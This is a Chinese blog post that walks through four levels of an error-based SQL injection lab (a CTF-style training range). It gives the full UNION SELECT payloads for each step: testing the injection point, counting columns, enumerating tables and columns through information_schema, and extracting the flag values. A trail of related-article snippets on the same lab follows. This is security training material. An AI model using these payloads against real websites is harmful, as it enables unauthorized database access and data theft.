(一)显错注入

最新推荐文章于 2024-08-05 17:22:13 发布
最新推荐文章于 2024-08-05 17:22:13 发布
阅读量599 收藏 3
点赞数 2
分类专栏: 信息安全 文章标签: mysql java php sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_16864631/article/details/108867437
版权
本文详细介绍了四个不同Rank级别的SQL注入漏洞利用过程,包括验证注入点、判断列数和显示位置、获取数据库信息、列举表和字段以及提取敏感数据。每个级别都展示了如何通过注入SQL语句逐步揭示数据库结构和数据,最终获取到Flag。内容涵盖了SQL注入的基本技巧和步骤,适合安全研究人员和Web开发者学习。
摘要由CSDN通过智能技术生成

1-SQL注入-显错注入Rank 1
Tips:
通过注入找到数据库中的Flag吧
Flag格式zKaQ-XXXXXXXX

**大概思路:
1、先验证是否可以执行SQL语句来判断是否存在SQL漏洞,
2、通过order by查询到存在多少个字段。
3、通过联合查询来获得回显字段。
4、获取数据库名称以及链接用户名。
5、列出数据库中所有的表.
6、列出目标表中所有的字段
7、列出目标字段中的信息

1、先验证是否可以执行SQL语句来判断是否存在SQL漏洞
地址栏可以看到id=1,那么我放入id=5-4,页面显示正常,再添加and 1=1,页面依旧正常,再测试and 1=2显示异常,这说明此处可以进行运算符运算和逻辑运算,是可以执行sql语句的,所以存在sql注入漏洞。

在这里插入图片描述

图1-1 执行”and 1=1”的执行结果

在这里插入图片描述

图1-2 执行”and 1=2”的执行结果

2、通过order by查询到存在多少个字段
我先假设存在5个字段,我执行order by 5,显示异常

在这里插入图片描述

图 1-3 执行”order by 5”的执行结果

二分法取值3再测试order by 3,显示正常。

在这里插入图片描述

图1-4 执行”order by 3”的执行结果

再执行order by 4,显示不正常,可以确定存在3个字段。

在这里插入图片描述

图 1-5 执行“order by 4”执行结果

3、通过联合查询来获得回显字段
执行“union select 1,2,3”来查看回显点。通过执行结果可以看出显示的是第二和第三字段。
在这里插入图片描述

图1-6 “union select 1,2,3”执行结果

4、获取数据库名称以及数据库连接用户名
上一步的操作 我们获得了回显点,现在将database()替换2,执行union select 1,database(),user(),得到结果如下图,可以得知数据库名称为error,数据库用户名为nf2019@10.42.229.66

在这里插入图片描述

图1-7 union select 1,database(),user()执行结果

5、列出数据库中所有的表.
group_concat 一次性全部显示
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = ‘error’

在这里插入图片描述

图1-8 group_concat执行结果

从执行结果可以得出存在两个表分别为:error_flag,user

6、列出目标表中所有的字段
union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’error_flag’ and table_schema=database()

在这里插入图片描述
1-9 执行结果

7、列出目标字段中的信息

执行 union select 1,2,group_concat(flag) from error_flag

在这里插入图片描述

图1-10 列出字段中的信息
通过信息可得到4个flag:zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K

通过提交zKaQ-Nf获得通过。

2-SQL注入-显错注入Rank 2 (Rank: 5)

Tips:
通过注入找到数据库中的Flag吧
Flag格式zKaQ-XXXXXXXX

**大概思路和第一题差不多:
1、先验证是否可以执行SQL语句来判断是否存在SQL漏洞;
2、判断列数。
3、判断显示位。
4、获取数据库名称以及链接用户名。
5、列出数据库中所有的表.
6、列出目标表中所有的字段
7、列出目标字段中的信息

1、先验证是否可以执行SQL语句来判断是否存在SQL漏洞
列常来个and 1=1和and 1=2均显示正常,来个id=4-3,报错了,查看原因是’没有闭合,加’ — a’,显示正常,存在sql注入,但是要注意’闭合。此处存在注入点。

在这里插入图片描述

图2-1 执行id=1’ and 1=1 — a’结果

在这里插入图片描述

图2-2 执行id=1’ and 1=2 — a’结果

2、判断列数
执行order by 4 报错执行order by 3正常,所以存在3列,3个字段。

在这里插入图片描述

图2-3 执行order by 3结果

3、判断显示位。
执行’union select 1,2,3 — a’,可以得知显示点为2,3
在这里插入图片描述

图2-4 执行’union select 1,2,3 — a’结果

4、获取数据库名称以及链接用户名
执行’union select 1,user(),database() — a’得到数据库名称为error

在这里插入图片描述

图2-5回显数据库名称以及连接用户名

5、列出数据库中所有的表
执行’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = ‘error’ — a’

在这里插入图片描述

图2-6 查询得到error_flag,user表

6、列出目标表中所有的字段
执行’union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’error_flag’ and table_schema=database() — a’

在这里插入图片描述

图2-8 查询到表error_flag中存在flag字段

7、列出目标字段中的信息
执行’union select 1,2,group_concat(flag) from error_flag — a’
得到flag:zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K

在这里插入图片描述

图2-9 得到flag
在这里插入图片描述

图 2-10 提交zKaQ-BJY成功

3-SQL注入-显错注入Rank 3 (Rank: 5)
Tips:
通过注入找到数据库中的Flag吧
Flag格式zKaQ-XXXXXXXX

思路:
1、验证是否存在sql注入;
2、判断列数。
3、判断显示位。
4、获取数据库名称
5、列出数据库中所有的表.
6、列出目标表中所有的字段
7、列出目标字段中的信息

1、验证是否存在sql注入;
通过分析要注意其中有’闭合和括号闭合,故结尾需要添加)— a实现闭合
执行select from user where id=(‘1’and 1=2 )— a’)报错
执行select from user where id=(‘1’and 1=1 )— a’)正常
所以存在注入点

在这里插入图片描述

图3-1 验证存在注入点

2、判断列数。
执行select from user where id=(‘1’)order by 3— a’’)正常
执行select from user where id=(‘1’)order by 4— a’)
所以存在3例,即3个字段。
在这里插入图片描述

图3-2 执行order by 3结果

在这里插入图片描述

图3-3 执行order by 4结果

3、判断显示位
执行select *from user where id=(‘1’)union select 1,2,3 — a’)得到回显点为2,3

在这里插入图片描述

图3-4 得到回显点

4、获取数据库名称
执行select *from user where id=(‘1’)union select 1,2,database() — a’)得到数据库名称为error

在这里插入图片描述

图3-5 的到数据库名称

5、列出数据库中所有的表
执行select *from user where id=(‘1’)union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = ‘error’ — a’)
得到数据库中有error_flag,user表

在这里插入图片描述

图3-6 得到数据库中的表名称

6、列出目标表中所有的字段
执行select *from user where id=(‘1’)union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’error_flag’ and table_schema=database() — a’)
得到error_flag表中的字段为Id,flag

在这里插入图片描述

图3-7 列出error_flag中的字段

7、列出目标字段中的信息
执行select *from user where id=(‘1’)union select 1,2,group_concat(flag) from error_flag — a’)得到flag:zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K
在这里插入图片描述

图3-8 得到flag

通过提交测试flag为:zKaQ-XiaoFang

4-SQL注入-显错注入Rank 4 (Rank: 5)
思路:
1、验证是否存在sql注入;
2、判断列数。
3、判断显示位。
4、获取数据库名称
5、列出数据库中所有的表.
6、列出目标表中所有的字段
7、列出目标字段中的信息

1、验证是否存在sql注入
这个题需要注意双引号和括号的闭合:
执行and 1=1 和and 1=2测试存在sql注入点

在这里插入图片描述

在这里插入图片描述

图4-1 验证注入点

2、判断列数
执行select from user where id=(“1”)order by 3 — a”)正常
执行select from user where id=(“1”)order by 3 — a”)异常,可以判断有3列。

在这里插入图片描述
在这里插入图片描述

图4-2 判断列数

3、判断显示位
执行select *from user where id=(“1”)union select 1,2,3 — a”)
得知回显点为2,3
在这里插入图片描述

图4-3 判断回显点

4、获取数据库名称
执行select *from user where id=(“1”)union select 1,2,database() — a”)得到数据可以名称为error
在这里插入图片描述

图 4-4 得到数据库名称

5、列出数据库中所有的表
执行select *from user where id=(“1”)union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = ‘error’ — a”)得到表error_flag,user

在这里插入图片描述

图4-5 得到表

6、列出目标表中所有的字段
执行select *from user where id=(“1”)union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’error_flag’ and table_schema=database() — a”)
得到表中的字段为:Id,flag

在这里插入图片描述

图4-6 得到表中的字段

7、列出目标字段中的信息
执行
select *from user where id=(“1”)union select 1,2,group_concat(flag) from error_flag — a”)
获得flag为:zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K

在这里插入图片描述

图4-7获得flag

通过提交测试得到flag为:zKaq-98K

李连活的个人博客入口

土狗不会飞
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MYSQL注入-显错注入
晨辰.的博客
05-02 1082
MYSQL数据库注入
Sql注入学习笔记——MySQL显错注入
qq_44720214的博客
07-26 1264
显错注入又叫报错注入,其原理是通过利用数据库的某些机制,人为地制造错误条件使得查询结果能够出现在错误信息中。
显错注入(一)
qq_45300786的博客
06-24 2843
显错注入(一) 注入环境: http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 SQL注入原理解析以及举例1   sql注入是指web应用程序对用户输入数据的合法性没有判断, 导致攻击者可以构造不同的sql语句来实现对数据库的操作。   sql注入漏洞产生满足条件:     1;用户能够控制数据的输入。     2;原本需要执行的代码,拼接了用户的输入。  举例:   注意:下面测试环境使用封神台免费靶场。可以从下面链接进入:https://hack.
sql注入1-4关实现
最新发布
lxy9298的博客
08-05 262
爆出库是 ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test。发现本关的闭合方式不同,需要使用?id=1")闭合,然后参考第二关。这关和第一第二关十分相似,所以先输入判断。id=1' 报错 ' .0 '所以判断本关需要闭合?id=1'--+ 正常。id=1'--+ 报错。那么我们继续先输入判断情况。id=1')闭合查看。id=1")闭合查看。爆出列是id,flag。直接参考第二关的闭合。
SQLI-LABS 01.第一关 【显错注入_单引号闭合】
weixin_45284414的博客
05-15 536
首先主动输入一个单引号提前闭合,最后-- x注释掉后边内容。中间可以构造使用AND OR 拼接语句进行探测。01.第一关 【显错注入_单引号闭合】)利用常规的显错注入去做题。
渗透测试基础-显错注入
weixin_45488495的博客
04-07 1331
渗透测试基础-显错注入显错注入是什么网站错误显示恶意语句的尝试进入靶场看看实际情况![在这里插入图片描述](https://img-blog.csdnimg.cn/2021040621394241.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTQ4ODQ5NQ==,size_16,color_FFFFFF,t_70)进一步尝
SQL注入显错注入
kagariiiii的博客
03-28 284
Sql注入 原理:将用户输入的数据当做sql语句来执行 两个条件:1.用户能用控制输入的内容 2.程序原本要执行的代码拼接了用户的数据执行 pass-01 1.由url判断为get传参 2.输入?id=1 and 1=1,页面显示正常 输入?id=1 and 1=2,页面显示错误 由此判断为数字型注入且有回显 3.输入?id=1 order by 4 页面显示错误 输入?id=1 order by 3 页面显示正常 由此判断当前表中字段数为3 4.使用联合查询 输入?id=1 and 1=2 union s
webug————显错注入
weixin_55554070的博客
01-10 2641
1、打开靶场,寻找注入点进行测试 id=1 2、输入’;";),进行判断查看是否报错 输入”;)页面无变化,’出现报错,说明存在SQL注入 3、注入流程 :寻找注入点—>构造注入语句查看数据库版本与信息—>获取敏感数据或getshell。 判断数据库版本(MySQL数据库版本在5.0以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息);库——表——字段——数据 4、判断字段数 order by 5、3页面报错 2页面正常,说明.
Webug靶场之旅——显错注入
weixin_53953503的博客
08-18 794
显错注入 显错注入SQL注入的一种,而SQL注入是指web应用程序对用户输入数据的合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作。 SQL注入漏洞产生的条件:  1、用户能够控制数据的输入。  2、原本执行需要执行的代码时,拼接了用户的输入。 打开webug靶场,打开id为1的靶场后,如图: 这里我们使用工具的是Hackbar2.1.3版本,这个是免费的。 首先,我们需要判断是否存在SQL注入。在参数后面多加一个单引号,然后将它上传,发现报错了 通过页面的返回结果,
封神台靶场 | 显错注入 | Pass01-04
Fanny0602的博客
03-05 944
封神台靶场 | 显错注入 题目地址: 掌控安全学院SQL注入靶场 显错注入 Pass01 Pass02 Pass03 Pass04 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass01 数据库查询语句: select *from user where id=1 Pass02 数据库查询语句: select *from user where id=‘1’ Pass03 数据库查询语句: select *from user where id=(‘1’) Pass04 数据库查询语
SQL注入显错注入(一)
Mr.Huang_的博客
08-10 306
SQL注入的原理解析 sql注入是指web应用程序对用户输入数据的合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作。 SQL注入本质 谈到SQL注入前我们先谈谈什么是注入 注入攻击的本质,是把用户输入的数据当做代码执行。 SQL注入的本质 用户输入的数据当做SQL代码执行 SQL注入的条件,这里有两个关键条件 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行 MySQL系统自带库 MySQL 中存储所有数据库名、所有表名、所有字段名
SQL注入--显错注入
weixin_48803011的博客
12-14 737
显错注入就是通过sql注入再利用网页的显示位进行数据的读取
webug——显错注入
我只会装360的博客
09-17 316
这里遇到一个小坑,首先需要切换php版本,不然不报错 插入单引号进行测试,发现报错,并且可以看到表名 接下来使用order by 查询列数,由于后面还存在一个’,可以采用注释将其跳出 (mysql有三种注释方法,1、# … 2、-- … 3、/…/,%23是#的url表示) 2列时正确 可以得到列数为2,再使用union查询,爆出显位,替换需要查询的数据 查询mysql版本 版本大...
Oracle显错注入函数
weixin_33970449的博客
07-04 298
Oracle包utl_inaddr  作用:用于取得局域网或Internet环境中的主机名和IP地址。  1、utl_inaddr.get_host_address 环境中IP地址  如果查询失败,则提示系统错误  查询的IP地址  select UTL_INADDR.get_host_address('www.qq.com') from dual;  查询本机IP地址  s...
【Web安全】-【SQL注入】-显错注入
weixin_43960003的博客
02-14 2669
显错注入sql注入的一种。是指web应用程序未对用户传入的数据做合法性校验,从而导致攻击者可以通过构造sql语句结合页面回显获取到想要的数据。
SQL注入--显错注入(zkaq)
weixin_74410605的博客
07-11 842
sql注入是一种数据库攻击攻击手段,就是用户在表单填写sql语句来使数据库执行该语句,在管理员不知情的情况下任意查询数据库中的信息,从而获得自身需要的信息,所以sql注入攻击的本质就是将用户输入的数据当作代码执行。
封神台SQL注入-基础靶场1-显错注入
原味瓜子、的博客
09-28 1401
一、显错注入 Pass-01 判断注入类型 id=1 //有回显 id=1' // No results found 判断为数字型注入 判断有几列 id=1 order by 3 //有回显 id=1 order by 4 // No results found 判断有三列 判断回显点 id=1 union select 1,2,3 ...
什么是mysql显错注入_十种MYSQL显错注入原理讲解(三)
weixin_34923852的博客
02-05 187
这回间隔时间有点长了,年前年后忙的头晕眼花,外加大病。下面我继续讲解。1、multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));函数讲解:multipolygon()是一种由Polygon元素构成的几何对象集合。原理解释:multip...
SQL显错注入的核心代码
05-06
其中,显错注入是一种常见的注入方式,它通过构造恶意输入,使得Web应用程序在执行SQL语句时发生语法错误,从而泄露敏感信息。以下是SQL显错注入的核心代码: ``` SELECT * FROM users WHERE username = '$username...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值